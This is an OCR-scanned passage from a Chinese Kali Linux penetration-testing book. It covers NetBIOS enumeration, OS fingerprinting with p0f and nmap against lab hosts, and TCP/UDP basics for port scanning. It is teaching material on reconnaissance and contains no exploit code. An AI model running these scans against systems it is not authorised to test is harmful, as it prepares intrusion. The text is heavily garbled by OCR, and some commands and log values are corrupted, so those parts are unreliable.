从 上 面 的 输出 结果 可 以 看 出 ， 找 到 的 NetBIOS 名 字 有 : PC-001. 
PC-003 和 SRV-001。 现 在 用 下 述 命令 查看 这 些 主机 运行 了 哪些 服务 。 
#nbtscan -hv 192.168.1.1-254 





该 指令 的 返回 结果 如 下 。 

NetBIOS Name Table for Host 192.168.1.81: 
PC-001 Workstation Service 

PC-001 File Server Service 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
Adapter address 00:25:9c:9f:b0:96 

NetBIOS Name Table for Host 192.168.1.90: 
PC-003 Workstation Service 

PC-003 Messenger Service 

PC-003 File Server Service 

. MSBROWSE . Master Browser 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
WORKGROUP Domain Name 
WORKGROUP Master Browser 

Adapter address 00:00:00:00:00:00 


从 上 面 输出 结果 可 以 看 出 ，PC-001 运 行 了 Workstation (工作 站 服 
务 ) 和 File Server (文件 服务 器 〉 。 而 在 PC-003 上 运行 3 个 服务 是 
Workstation. Messenger 和 File Server。 经 验 表 明 ， 这 些 信息 里 包含 了 哪 
台 机 器 提供 了 文件 共享 服务 。 下 一 步 我 们 可 以 检测 这 些 文件 共享 服务 是 
否 开 放 ， 继 而 访问 其 中 的 文件 。 





5.3 iH n Pe Z 


在 确定 目标 主机 在 线 后 ， 应 当 识别 它们 使 用 的 操作 系统 。 这 阶段 工 


作 通 常 称 为 识别 操作 系统 (也 称 为 操作 系统 指纹 识别 ) 。 识 别 操作 系统 
的 方式 分 为 两 种 : 主动 式 和 被 动 式 。 

主动 式 识别 工具 向 目标 机 器 发 送 数 据 包 ， 并 根据 目标 的 啊 应 确定 其 
使 用 的 操作 系统 。 这 种 方式 的 优点 在 于 探测 速度 快 ， 缺 点 是 目标 主机 可 
能 会 发 现 我 们 探测 操作 系统 的 行为 。 

被 动 式 操作 系统 识别 方法 元 服 了 主动 式 识别 方法 的 缺点 。Michal 
Zalewsky 是 这 种 探测 方式 的 先驱 ， 他 设计 的 pof 工 具 率先 实现 了 被 动 式 
的 识别 方法 。 被 动 式 方法 的 缺点 是 ， 它 比 主动 式 识 别 方法 的 识别 速度 
NS 
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5.3.1 pOf 

pOf 采 用 被 动 方式 的 方法 探测 目标 主机 的 操作 系统 类 型 。 这 个 工具 
可 以 识别 以 下 几 种 主机 : 

e 连接 到 您 主机 的 机 器 CSYN 模式 ， 即 默认 模式 ) ; 

e 您 主机 可 以 访问 的 机 器 (SYN+ACK 模式 ) ，; 

e 您 主机 不 能 访问 的 机 器 (RST+ 模 式 〉; 

e 您 可 以 监控 到 其 网 络 通信 的 机 器 。 

这 个 程序 通过 自身 发 出 的 TCP 数 据 包 分 析 操 作 系统 的 类 型 。 然 后 ， 
它 会 统计 在 默认 情况 下 不 会 产生 的 非 标准 数据 包 。 例 如 ，Linux 内 核 的 
操作 系统 默认 使 用 64 字 节 的 ping 数 据 报 ， 而 Windows 操 作 系 统 则 使 用 32 
字 节 的 ping 数 据 报 。 这 两 个 操作 系统 在 TTL 上 同样 存在 差别 。Windows 
发 出 的 数据 包 ， 其 TTL 是 128; 而 不 同 版 本 的 Linux 系 统 ， 其 数据 包 的 
TTL 各 有 不 同 。p0f 程 序 正 是 根据 这 些 细微 的 差别 识别 远程 主机 的 操作 系 
统 。 

Kali Linux 自 带 的 p0f 程 序 已 经 无 法 识别 远程 主机 的 操作 系统 。 原 因 
在 于 这 个 版 本 的 指纹 数据 库 过 于 陈旧 。 不 幸 的 是 ， 我 们 未 能 找到 最 新 版 























本 的 指纹 数据 库 。 所 以 我 们 使 用 了 pof v3 (Version 3.06b) ， 而 没有 使 
用 Kali Linux É E HJpOf 程序 。 如 需 使 用 这 个 版 本 的 p0f， 请 从 官方 网 站 
上 下 载 TARBALL 文件 (http://lcamtuf.coredump.cx/p0f3/releases/p0f- 
3.06b.tgz) ， 然 后 使 用 其 中 build.sh 脚本 进行 编译 。 默 认 情 况 下 ， 指 纹 数 
据 库 就 在 当前 编译 目录 里 。 如 果 您 想 把 它 放 在 其 他 目录 中 【例如 把 它 保 
Tf Jyletc/pOf/pOf.fp) ， 需 要 修改 config.h 文件 后 再 重新 编译 。 如 果 您 不 
更 改 这 个 设置 ， 就 要 在 每 次 使 用 它 的 时 候 ， 使 用 -f 选 项 指定 指纹 数据 库 
的 确切 位 置 。 

在 终端 中 输入 p0f-h 可 查看 它 的 使 用 方法 和 选项 说 明 。 

如 需 使 用 p0f 程 序 识 别 远 程 主机 的 操作 系统 ， 可 以 使 用 下 述 指令 。 

pOf —f /etc/pOf/pOf.fp -o pOf.log 

这 条 指令 将 会 读 取 指纹 数据 库 文 件 Cetc/pOf/pOf.fp) ， 然 后 把 分 析 
日 志保 存 为 p0flog。 与 此 同时 ， 它 在 屏幕 上 显示 下 述 内 容 。 

--- pOf 3.06b by Michal Zalewski<lcamtuf@coredump.cx> -- 














[+] Closed 1 file descriptor. 

[+] Loaded 314 signatures from "etc/pOf/pOf.fp'. 

[+] Intercepting traffic on default interface 'ethO'. 

[+] Default packet filtering configured [+VLAN]. 

[+] Log file 'pOf.log' opened for writing. 

[+] Entered main event loop. 

然后 ， 您 需要 与 这 人 台 主 机 建立 TCP 连 接 ， 产 生 一 些 网 络 流量 。 您 可 
以 浏览 远程 主机 的 文件 ， 或 者 让 远程 主机 连接 到 您 的 主机 。 

如 果 p0f 成 功 地 识别 出 远程 主机 的 操作 系统 ， 这 个 程序 将 会 在 日 志 
Xt CpOflog) 和 屏幕 上 记录 相关 信息 。 

在 我 们 运行 这 个 程序 时 ， 它 在 终端 中 显示 了 如 下 信息 。 

.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (syn) ] 

| 





| client = 192.168.56.101/42819 

| os = Linux 3.x 

| dist = 0 

| params = none 

| raw_sig = 4:64+0:0:1460:mss*10,7:mss,sok,ts,nop,ws:df,id+:0 
| 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (mtu) ] 
| 

| client = 192.168.56.101/42819 

| link = Ethernet or modem 


| raw_mtu = 1500 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (syn+ack) | 
| 

|server = 192.168.56.102/80 

| os = Linux 2.6.x 

| dist =0 

| params = none 

| raw. sig = 4:64+0:0:1460:mss*4,5:mss,sok,ts,nop, ws:df:0 
| 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (mtu) ] 


| 
|server = 192.168.56.102/80 


| link = Ethernet or modem 


| raw_mtu = 1500 


.-[ 192.168.56.101/42819 -> 192.168.56.102/80 (http request) ] 

| 

| client = 192.168.56.101/42819 

| app = Firefox 10.x or newer 

| lang = English 

| params = none 

| raw. sig = 1:Host, User-Agent, Accept-[text/html,application/ 

xhtml+xml,application/xml;q=0.9,*/*;q=0.8],Accept-Language=[en- 
US,en;q =0.5], Accept-Encoding=[gzip, deflate ],Connection= 
[keepalive]:Accept-Charset,Keep-Alive:Mozilla/5.0 (X11; Linux x86_64; 
1v:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 


-[ 192.168.56.101/42819 -> 192.168.56.102/80 (http response) | 


| 
|server = 192.168.56.102/80 


| app = Apache 2.x 

| lang = none 

| params = none 

lrlaw sig = 1:Date,Server,X-Powered-By=[PHP/5.2.4-2ubuntu5.10],? 
ContentLength, Keep-Alive=[timeout=15, max=100],Connection=[Keep- 


Alive],ContentType: Accept-Ranges:Apache/2.2.8 (Ubuntu) DAV/2 
| 





相应 的 日 志文 件 如 图 5.17 所 示 。 


[2013/06/28 22:47:57] mod=syn|cli=192.168.56.161/42819|srv=192.168.56.102/80|subj=clijos=Linux 3.x|dist=0|params=none| raw | 
isig=4:64+6:0:1460:mss*16,7:mss,sok,ts,nop,ws:df,id+:0 

(2013/66/28 22:47:57] mod=mtu|cli=192.168.56.101/42819|srv=192.168.56.102/80|subj=cli|link=Ethernet or modem| raw_mtu=1500 

(2013/05/28 22:47:57] mod=syn+ack|cli=192.168.56.161/42819|srv=192.168.56.102/86|subj=srv|os=Linux 2.6.x|dist=0|params=non 
le | raw_sig=4:64+0:6:1460:mss*4,5:mss,sok,ts,nop,ws:df:0 

[2013/06/28 22:47:57] mod=mtu|cli=192.168.56.161/42819|srv=192.168.56.102/80|subj=srv|link=Ethernet or modem| raw_mtu=1500 

[2013/06/28 22:47:57] mod-http request|cli=192.168.56.101/42819|srv=192.168.56.162/80|subj=cli|app=Firefox 10.x or newer|1 
iaang-English|params-none|raw sig-1:Host,User-Agent ,Accept=[text/ntml ,application/xhtml+xml ,application/xml ;q=0.9,*/*;q=0.8] 
, Accept -Language-[en-US,en;q-0.5], Accept -Encoding=[gzip, deflate] ,Connection=[keep-alive] :Accept -Charset ,Keep-Alive:Mozill 
a/5.0 (X11; Linux x86 64; rv:18.0) Gecko/20100101 Firefox/18.9 Iceweasel/18.0.1 

[2013/05/28 22:47:57] mod-http response|cli=192.168.56.101/42819|srv=192.168.56.102/8G6|subj=srv|app=Apache 2.x|1lang-none|p 
arams-none|raw sig-1:Date,Server,X-Powered-Byz[PHP/5.2.4-2ubuntu5.10] , ?Content -Length,Keep-Alive-[timeout-15, max-100],Con| 
nectionz[Keep-Alive],Content-Type:Accept -Ranges:Apache/2.2.8 (Ubuntu) DAV/2 


图 5.17 
根据 上 述 结 果 ， 我 们 可 判断 目标 主机 运行 的 操作 系统 是 Linux 2.6. 
在 目标 主机 上 查看 操作 系统 的 信息 〈 见 图 5.18) 。 


图 5.18 
比较 这 两 组 信息 ， 可 知 p0f 获取 的 操作 系统 信息 是 正确 的 。 远 程 主 
机 确实 运行 的 是 Linux Version 2.6。 
按 下 Ctrl+C 组 合 键 可 结束 p0f 程 序 。 








5.3.2 Nmap 
Nmap 是 一 款 非常 受 欢 迎 的 功能 强大 的 端口 扫描 程序 。 它 还 能 够 识 
别 操作 系统 的 操作 系统 ， 能 够 进行 主动 式 的 操作 系统 指纹 识别 。 如 需 使 
用 操作 系统 识别 功能 ， 您 需要 在 nmap 指 令 中 加 上 -O 选 项 。 
如 需 识 别 192.168.56.102 这 台 主 机 的 操作 系统 ， 我 们 可 使 用 下 述 指 


^ 
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nmap —O 192.168.56.102 
这 个 指令 的 运行 结果 如 图 5.19 所 示 。 


MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 
Device type: general purpose 

Running: Linux 2.6.X 

OS CPE: cpe:/o:linux:linux kernel:2.6 

OS details: Linux 2.6.9 - 2.6.33 

Network Distance: 1 hop 





OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds 








图 5.19 
Nmap 此 次 成 功 识 别 出 了 目标 主机 的 操作 系统 。 
本 书 的 后 续 章 节 还 会 详细 介绍 Nmap 程 序 。 


5.4 A ee AEN 





本 章 讨论 了 目标 识别 的 工作 流程 。 我 们 首先 介绍 了 目标 识别 的 作 
用 : 搜索 在 线 主 机 并 识别 目标 主机 的 操作 系统 。 而 后 ， 我 们 介绍 了 Kali 
Linux 里 可 用 于 目标 识别 的 工具 。 

本 章 介 绍 的 扫 摘 工具 有 ping、arping、fping、hping3、nping 和 
nbtscan。 我 们 还 介绍 了 在 IPv6 ”环境 下 进行 主机 扫描 的 工具 ， 例 如 
alive6、detect-new-ip6 和 passive_discovery6。 

本 章 还 介绍 了 操作 系统 的 识别 工具 一 一 p0f 和 nmap， 它 们 的 识别 方 
起 以 及 使 用 方法 。 

在 下 一 半 ， 我 们 将 介绍 服务 枚 举 ， 以 及 Kali Linux 中 包含 的 实现 服 
务 枚 举 的 工具 。 
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服务 枚 举 是 数 一 种 据 采 集 工 作 ， 用 于 获取 目标 主机 开放 端口 、 操 作 
系统 和 网 络 服 务 等 有 关 人 信息。 渗透 人 员 通 常会 首先 识别 出 在 线 的 目标 主 
机 ， 然 后 再 进行 服务 枚 举 。 在 实际 渗透 测试 中 ， 此 阶段 的 工作 属于 探测 
过 程 鸭 二 部 分 。 

本 章 介绍 下 几 个 内 容 : 

e 端口 扫 摘 ， 及 其 端口 扫 摘 工具 所 文 持 的 扫 拉 类型; 

e mO AHH 1.5 

e l2: Windows 系统 SMB 服务 的 扫描 工具 ; 

e 枚 举 SNMP 服 务 的 扫描 工具 ; 

e 枚 举 虚拟 专用 网 络 (Virtual Private Network, VPN) 的 扫描 工 





目标 枚 举 骨 在 最 大 程度 地 收集 目标 主机 的 网 络 服务 信息 。 这 些 信息 
将 使 我 们 在 后 续 阶 段 的 工作 一 一 识别 漏洞 的 工作 更 具 针 对 性 。 


6.1 端口 扫描 





简单 说 来 ， 端 口 扫 描 是 一 种 用 来 确定 目标 主机 TCP 端 口 和 UDP 端口 
状态 的 方法 。 主 机 开放 了 菜 个 端口 ， 就 意味 着 它 在 这 个 端口 提供 某 种 网 
络 服务 。 如 果 某 个 端口 处 于 关闭 状态 ， 则 说 明 主 机 在 这 个 端口 上 并 没有 
提供 网 络 服务 。 

在 确定 某 端 口 处 于 开放 状态 之 后 ， 攻 击 人 员 就 会 检查 在 该 端口 提供 
相应 服务 的 程序 版 本 ， 以 判断 这 个 版 本 的 程序 是 否 存在 漏洞 。 例 如 说 ， 
主机 A 使 用 的 是 数 年 前 的 1.0 版 本 的 Web 服 务 端 程序 ， 而 且 官 方 发 布 过 这 


























个 版 本 的 安全 公告 。 公 告 内 容声 明了 1.0 版 本 程序 存在 某 种 漏洞 。 如 果 
攻击 人 员 能 够 检测 到 服务 器 A 开放 了 Web 服 务 器 ， 而 且 能 够 确定 这 个 程 
序 的 版 本 号 ， 他 们 就 能 利用 有 关 信 息 攻 击 服 务 器 。 可 见 ， 主 机 上 服务 软 
件 的 信息 十 分 重要 。 

在 进行 端口 扫描 的 工作 之 前 ， 我 们 首先 简要 介绍 一 下 TCP/IP 协 议 及 
其 应 用 。 

6.1.1 TCP/IP 协 议 

TCP/IP 协 议 是 很 多 协议 的 统称 。 这 些 协议 里 最 重要 的 两 个 协议 就 是 
TCP 协 议和 IP 协 议 。IP 协 议 提 供 了 寻 址 、 路 由 等 主机 互联 的 功能 
TCP 协 议 约 定 了 连接 管理 、 在 两 台 主 机 间 建 立 数据 通信 可 靠 传 输 的 标 
准 。IP 协 议 是 OSI 模 型 的 第 3 层 协议 ， 而 TCP 协 议 是 传输 层 (OSI 第 4 层 ) 
协议 。 

UDP 协议 是 和 TCP 同 等 重要 的 传输 层 协 议 。 那 么 这 两 种 协议 之 间 的 
区 别 在 哪儿 呢 ? 

简要 地 说 ，TCP 有 以 下 特点 。 

e TCP 协议 是 面 同 连接 的 协议 : 在 使 用 TCP 协议 传输 数据 之 前 
发 起 连接 的 客户 端 和 受理 连接 的 服务 器 之 间 必 须 通过 三 次 握手 建立 连 
接 。 

€ 客户 端 向 服务 器 发 送 初始 化 连接 的 SYN 请 求 包 。 这 个 数据 包 的 
序列 号 CSequence number) 字段 将 包含 随机 的 初始 化 序列 号 ASN) 信 





em 


令 ”服务 器 将 客户 端 发 送 的 ISN 加 1 之 后 ， 作 为 自己 的 ACK 数 据 序列 
号 ， 以 此 对 客户 端 SYN 信息 表示 确认 ， 而 且 服 务 器 的 数据 包 会 使 用 独 
立 的 序列 号 。IP 数 据 包 里 有 个 专门 的 ACK 标识 位 (flag bit) ， 服 务 器 把 
这 个 标识 位 设置 为 1 以 表示 该 数据 包 是 确认 数据 包 。 

€ 客户 端 再 将 服务 器 刚才 回复 的 ISN+1， 并 向 服务 器 发 送 ACK Ff 


认 包 。 此 后 ， 两 台 主 机 开始 传输 数据 的 正式 过 程 。 

TCP 协议 终止 连接 的 机 制 如 下 所 示 。 

€ 客户 端 发 送 一 个 含有 FIN (finish) 标志 的 数据 包 。 

€ 服务 器 发 送 ACK 确认 数据 ， 以 告知 客户 端 它 已 经 受理 了 FIN 的 
数据 包 。 

€ 应 用 服务 器 在 关闭 连接 之 前 ， 会 再 发 送 一 个 FIN 数据 包 给 客户 
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€ 客户 端 对 服务 器 的 FIN 请 求 发 送 ACK 确认 数据 包 。 通 常情 况 
下 ， 客 户 端 和 服务 器 在 发 送 FIN 信 号 之 后 都 可 以 独自 关闭 连接 。 

e TCP 协议 是 可 靠 的 传输 协议 : TCP 协议 使 用 序列 号 和 确认 信号 
(ACK 数据 包 ) 来 识别 数据 包 。 每 当 接 收 方 收 到 一 个 数据 包 ， 它 都 会 
发 送 ACK 数据 包 以 进行 确认 。 如 果 任 何 一 方 没 有 收 到 对 方 的 ACK 数 
据 包 ， 它 会 自动 重 传 。 即 使 接收 方 收 到 了 乱 序 的 数据 包 ， 根 据 TCP th 
议 ， 接 收 方 可 在 重新 整理 数据 包 的 顺序 之 后 ， 再 把 数据 传 给 (接收 数据 
的 ) 应 用 程序 。 

多 数 传送 文件 的 应 用 程序 ， 或 者 传递 重要 数据 的 程序 都 使 用 TCP 
协议 。 例 如 超 文本 传输 协议 HTTP) 和 文件 传输 协议 (FTP) 都 是 基 
于 TCP 的 传输 协议 。 

UDP 协议 的 特征 与 TCP 协 议 相 反 。 

e UDP 协议 不 是 面向 连接 的 协议 。 在 采用 这 种 协议 传输 数据 时 ， 收 
发 双方 不 必 建 立 UDP 连接 。 

e UDP 协议 旨 在 尽 可 能 地 将 数据 包 发 送 到 目标 地 址 。 如 果 在 传输 过 
程 种 发 生 了 丢 包 的 情况 ，UDP 协 议 不 会 自动 重 传 〈《 即 操作 系统 不 负责 
新 传送 UDP 包 ) 。 由 应 用 程序 决定 是 否 重新 传送 数据 包 。 

能 够 接受 丢 包 情况 的 应 用 程序 ， 例 如 视频 流 和 其 他 多 媒体 程序 ， 多 
数 会 采用 UDP 协议 传输 数据 。 著 名 的 域名 解析 系统 DNS) 、 动 态 主 机 
配置 协议 (DHCP) 和 简单 网 络 管理 协议 SNMP) 使 用 的 都 是 UDP 协 




















议 。 

为 了 能 够 将 网 络 数据 正确 地 传送 给 相应 的 应 用 程序 ， 传 输 层 实现 了 
一 种 名 为 端口 (port) 的 寻 址 方式 。 在 服务 器 端 ， 软 件 程序 都 在 特定 服 
务 端口 受理 网 络 数据 ;客户 端 辐 服务 器 端口 发 送 的 数据 ， 将 会 被 服务 器 
端 对 应 的 软件 程序 受理 。 端 口号 码 是 16 位 的 编码 ， 取 值 范 围 是 0— 
65535。 为 了 避免 使 用 上 的 混乱 ， 这 些 端口 大 多 有 着 约定 俗 成 的 用 途 。 

e 公认 的 端口 〈0 一 1023) : 这 个 范围 内 的 端口 又 称 为 保留 端口 ， 
通常 供 系统 管理 员 〈 或 高 权限 用 户 ) 运行 的 服务 端 程序 使 用 。SSH (22 
号 端口 ) 、HTTP (80 号 端口 ) 、HTTPS (443 号 端口 ) 等 常用 服务 端 
口 都 是 这 个 范围 内 的 端口 。 

E 注册 的 端口 〈1024 一 49151) : Internet 授权 地 址 分 配 组 
(IANA) 提供 这 一 范围 内 的 端口 的 注册 服务 。 人 们 可 以 把 他 们 上 自己 的 
客户 端 /服务 器 程序 C client-server application) 所 使 用 的 端口 号 在 IANA 

登记 备案 。 

e 私有 端口 /动态 端口 〈49152 一 65535) : 所 有 人 都 可 以 随意 使 用 这 
个 范围 内 的 端口 ， 而 不 必 同 IANA 注册 端口 号 。 

在 简要 讨论 了 TCP 和 UDP 之 间 的 区 别 之 后 ， 我 们 接 下 来 介绍 TCP 和 
UDP 数据 包 的 具体 格式 。 

6.1.2 TCP# UDP) # xt 

TCP 数 据 包 叫 作 TCP 信 息 段 (segment) 。 每 个 TCP 消 息 段 由 报头 
(header) 和 数据 构成 。 如 果 TCP 消息 段 不 含有 TCP 选项 (TCP 
option) ， 那 么 它 的 报头 的 大 小 应 当 是 20 5E (IPv4) 。 整 个 消息 段 的 
结构 如 图 6.1 所 示 。 











目的 端口 
(16 位 ) 


序列 号 
(32 位 ) 


确认 号 
(32 位 ) 


HLen Rsvd 控制 位 窗口 大 小 
(4 位 ) (4 位 ) (4 位 ) (16 位 ) 


校 验 和 紧急 指针 
(16 位 ) (16 位 ) 





图 6.1 
上 述 各 字段 的 作用 如 下 。 
e 源 端 口 和 目的 端口 各 占 16 位 。 源 端口 是 发 送 方 在 发 送 该 数据 包 
时 所 使 用 的 端口 ， 目 的 端口 是 接收 方 接收 该 数据 的 端口 。 
e 序列 写 是 32 位 数据 。 在 常规 情况 下 ， 它 是 标识 这 个 消息 段 的 序列 














e 确认 号 同样 是 32 位 数据 。 它 是 上 一 次 已 成 功 收 到 的 数据 字 节 序号 
加 1。 

e HLen 是 TCP 报头 的 长 度 ， 它 占 了 32 位 数据 中 的 头 4 位 。 

e Rsvd 是 个 4 位 大 小 的 保留 字段 ， 它 的 值 必须 为 零 。 

e 控制 位 的 4 位 数据 可 以 通过 排列 组 合 表示 8 个 1bit 的 标志 位 。 在 旧 
有 的 RFC 793 规 范 中 (RFC 793 的 下 载 地 址 是 http://www .ietf. 
org/rfc/ríc793.txt) ， TCP 只 有 6 个 标志 位 。 

SYN: 同步 标志 位 ， 此 位 在 建立 会 话 时 使 用 。 

ACK: 包含 该 确认 字段 的 TCP 数据 ， 是 对 以 前 接收 到 的 数据 包 的 
确认 。 








RST: 重 置 连接 的 标识 位 。 
FIN: 表示 发 送 方 已 经 没有 数据 需 发 送 ， 将 要 以 正音 方式 关闭 连 
接 。 
PSH: 告诉 接收 方 应 当 把 缓冲 区 的 数据 立即 推送 给 应 用 程序 ， 而 不 
要 再 等 待 接收 更 多 的 数据 。 
URG: 这 个 标识 位 用 以 说 明 TCP 报 头 里 的 紧急 指针 (Urgent 
Pointer) 有 特殊 含义 。 紧 急 指 针 和 序号 字段 相 加 的 和 ， 表 示 最 后 一 个 紧 
和 急 数 据 的 下 一 字 节 的 序号 。 
e 后 来 ， 新 推出 的 REC 3168 Chttp://www.ietf.org/rfc/rfc3168.txt) 增 
加 了 两 个 标志 位 。 
Congestion Window Reduced (CWR) : 窗口 调整 标识 位 。 数 据 发 
送 方 通过 这 个 标识 位 通知 接收 方 * 由 于 网 络 拥 塞 ， 不 得 不 减 小 发 送 队 列 
的 长 度 〈 缩 小 TCP 窗 口 ) ”。 
Explicit Connection Notification-Echo (ECN-Echo) : 拥塞 通告 标识 
。 这 个 标识 位 表明 网 络 连 接 存在 拥塞 问题 。 
e 窗口 大 小 占 报 文 头 的 16 位 。 它 用 来 声明 接收 方 将 接收 的 字 节 数 








E 





m 


e 校 验 和 占 16 位 ， 用 于 校 验 TCP 报头 和 数据 体 。 

这 些 标志 位 可 单独 设置 。 

如 需 全 面 了 解 TCP 协 议 的 各 项 规范 ， 请 参阅 RFC 793 和 RFC 3168. 

在 使 用 含有 SYN 的 数据 包 进 行 端口 扫描 时 ， 攻 击 者 可 能 收 到 的 远程 
啊 应 分 为 以 下 几 种 。 

e 目标 主机 回应 SYN-ACK 包 。 如 果 收 到 了 这 种 数据 包 ， 我 们 可 以 
确定 该 端口 处 于 开放 状态 。 这 是 TCP 规范 (RFC 793) 中 定义 的 标准 响 
应 方式 。 依 据 REC 793， 开 放 问 口 在 收 到 SYN 包 时 必须 回应 SYN-ACK 
包 ， 而 不 处 理 SYN 包 里 的 具体 数据 。 

e 目标 主机 可 能 会 返回 数据 包 ， 而 且 这 个 数据 包 设 有 RST 标 识 位 和 


ACK 标识 位 。 这 意味 该 端口 处 于 关闭 状态 。 

e 目标 主机 可 能 会 返回 一 个 “ICMP 消息 〈 例 如 ，ICMP Port 
Unreachable) 。 多 数 情况 下 ， 这 是 防火 墙 阻 止 了 SYN 数 据 包 造 成 的 。 

e 目标 主机 还 有 可 能 不 进行 响应 。 无 论 目 标 主机 的 这 个 端口 没有 开 
放 网 络 服务 ， 还 是 防火 墙 以 静默 模式 阻塞 了 探测 的 SYN 包 ， 都 可 能 发 生 
这 种 情况 。 

渗透 测试 人 员 只 对 开放 的 端口 感 兴趣 ， 因 为 这 些 开 放 端 口 的 背后 必 
然 是 某 种 服务 程序 ， 而 这 些 服务 端 程 序 正 是 后 续 测 试 的 对 象 。 

要 想 使 渗透 测试 的 攻击 工作 富有 成 效 ， 就 要 在 充分 理解 TCP 行为 
的 基础 上 进行 端口 扫描 。 

下 文 将 从 报头 格式 开始 介绍 UDP 协议 。 我 们 首先 介绍 UDP 数据 的 报 
头 〈 见 图 6.2) 。 


0 15 31 
图 6.2 


上 图 中 各 字段 的 功能 如 下 。 

e 和 TCP 报头 一 样 ，UDP 报头 也 有 相应 的 源 端口 和 目的 端口 。 这 
两 个 字段 各 占 。 16 位 。 源 端口 是 发 送 数据 包 的 主机 使 用 的 端口 ， 目 的 端 
口 是 接 收 数据 的 目标 主机 的 端口 。 

e UDP 长 度 是 UDP 报头 的 长 度 。 

e UDP 校 验 和 是 用 于 检测 UDP 报头 和 数据 错误 的 16 位 校 验 和 。 

请 注意 UDP 报 文 头 没有 序列 号 和 确认 号 ， 也 没有 控制 位 。 

在 扫描 目标 主机 的 UDP 端口 时 ， 攻 击 者 可 能 收 到 的 响应 分 为 以 下 几 














种 。 

e 目标 主机 回复 UDP 数据 包 。 如 果 收 到 了 回复 数据 ， 可 判断 该 端口 
处 于 开放 状态 。 

e 目标 主机 可 能 会 返回 ICMP 消 息 〈 例 如 ，ICMP Port 
Unreachable) 。 这 种 消息 表明 该 端口 处 于 关闭 状态 。 但 是 如 果 收 到 的 是 
ICMP Port Unreachable 以 外 的 ICMP 信 息 ， 则 意味 着 防火 墙 阻 止 了 到 这 
个 端口 的 通信 。 

e 目标 主机 还 可 能 不 进行 任何 啊 应 ， 以 下 情况 都 可 能 发 生 这 种 情 
况 : 

o 端口 处 于 关闭 状态 ; 

o 入 站 (Cinbound) UDP 包 被 过 滤 了 ; 

o 目标 主机 的 响应 被 屏蔽 了 。 

UDP 端口 扫描 结果 的 可 靠 程度 不 及 TCP 扫 描 。 在 某 些 情况 下 ， 工 作 
于 UDP 协议 的 服务 端 程序 可 能 只 响应 特定 类 型 的 UDP 数据 包 。 所 以 在 
进行 UDP 端口 扫描 时 ， 即 使 某 些 端口 处 于 开放 状态 ， 目 标 主机 同样 可 
能 没有 任何 响应 。 

前 文 已 经 简要 介绍 了 端口 扫描 的 理论 ， 后 文 将 介绍 实践 的 环节 。 后 
续 章节 里 ， 我 们 通过 几 球 工具 进行 网 络 扫 描 。 

为 了 便于 本 书 演示 ， 我 们 将 对 装 有 Metasploitable 的 虚拟 主机 进行 扫 
描 。 第 1 章 介绍 过 它 的 安装 和 配置 方法 。 在 后 续篇 幅 里 ， 除 非特 别 声 
明 ，Metasploitable 虚 拟 机 的 IP 地 址 是 192.168.56.103， 而 我 们 进行 渗透 测 
试 的 主机 地 址 是 192.168.56.102。 











本 节 将 介绍 多 区 工具 。 这 些 工具 可 发 现 开放 端口 ， 识 别 远 程 主机 的 
操作 系统 ， 枚 举 运行 其 上 的 各 种 服务 。 


服务 枚 举 是 在 特定 主机 、 特 定 端口 上 识别 服务 端 程 序 版 本 的 方法 。 
有 了 服务 器 端 软件 的 版 本 信息 ， 测 试 人 员 就 可 以 查找 该 版 本 上 存在 的 安 
全 漏洞 。 

确实 有 一 些 管 理 员 有 定期 更 改 服 务 程序 运行 端口 的 习惯 。 例 如 ， 
SSH 服务 程序 的 通常 运行 在 22 号 端口 上 ， 但 是 系统 管理 员 可 能 把 它 改 为 
2222 之 类 的 其 他 端口 。 渗 透 测 试 人 员 如 果 只 是 检测 了 SSH 的 常规 端口 ， 
就 不 会 发 现 目标 主机 运行 了 SSH 服 务 。 在 非 标准 端口 上 运行 的 专用 程序 
往往 也 是 渗透 测试 人 员 的 一 大 难题 。 服 务 枚 举 工 具 能 够 在 一 定 程度 上 减 
轻 这 两 方面 的 问题 。 使 用 服务 枚 举 工具 对 全 部 端口 进行 无 差别 扫描 ， 会 
增加 识别 成 功 的 几率 。 








6.2.1 Nma 


Nmap 是 被 专业 人 员 广 泛 使 用 的 一 球 功 能 全 面 的 端口 扫描 工具 。 它 
由 Fyodor 编写 并 维护 。 由 于 Nmap 品 质 卓 越 ， 使 用 灵活 ， 它 已 经 是 渗透 
测试 人 员 必 备 的 工具 。 

除了 端口 扫描 外 ，Nmap 还 具备 如 下 功能 

3 OA Nmap 可 查找 目标 网 络 中 的 在 线 主机 。 默 认 情 况 下 ， 
Nmap 通过 4 种 方式 一 -ICMP echo 请 求 (ping) 、 癌 443 端 口 发 送 TCP 
SYN 包 、 向 80 端 口 发 送 TCP ACK 包 和 ICMP 时 间 惟 请 求 一 KF EL RE 
机 。 

e 服务 /版 本 检测 ， 在 发 现 开放 端口 后 ，Nmap 可 进一步 检查 目标 主 
机 的 检测 服务 协议 、 应 用 程序 名 称 、 版 本 写 等 信息 。 

e 操作 系统 检测 : Nmap 癌 远 程 主机 发 送 一 系列 数据 包 ， 并 能 够 将 
远程 主机 的 啊 应 与 操作 系统 指纹 数据 库 进行 比较 。 如 果 发 现 了 [匹配 结 
果 ， 它 就 会 显示 [匹配 的 操作 系统 。 它 确实 可 能 无 法 识别 目标 主机 的 操作 
系统 ; 在 这 种 情况 下 ， 如 果 您 知道 目标 系统 上 使 用 的 何 种 操作 系统 ， 可 
在 它 提 供 的 URL 里 提交 有 关 信 息 ， 更 新 它 的 操作 系统 指纹 数据 库 。 














e 网 络 路 由 跟踪 : 它 通 过 多 种 协议 访问 目标 主机 的 不 同 端口 ， 以 尽 
可 能 访问 目标 主机 。Nmap 路 由 跟踪 功能 从 ITTL 的 高 值 开始 测试 ， 逐 步 
递减 TIL， 直 到 它 到 零 为 止 。 

e Nmap 脚本 引擎 : 这 个 功能 扩充 了 Nmap 的 用 途 。 如 果 您 要 使 用 
Nmap 实现 它 〈 在 默认 情况 下 ) 没有 的 检测 功能 ， 可 利用 它 的 脚本 引擎 
手写 一 个 检测 脚本 。 目 前 ，Nmap 可 检查 网 络 服务 的 漏洞 ， 还 可 以 枚 举 
目标 系统 的 资源 。 

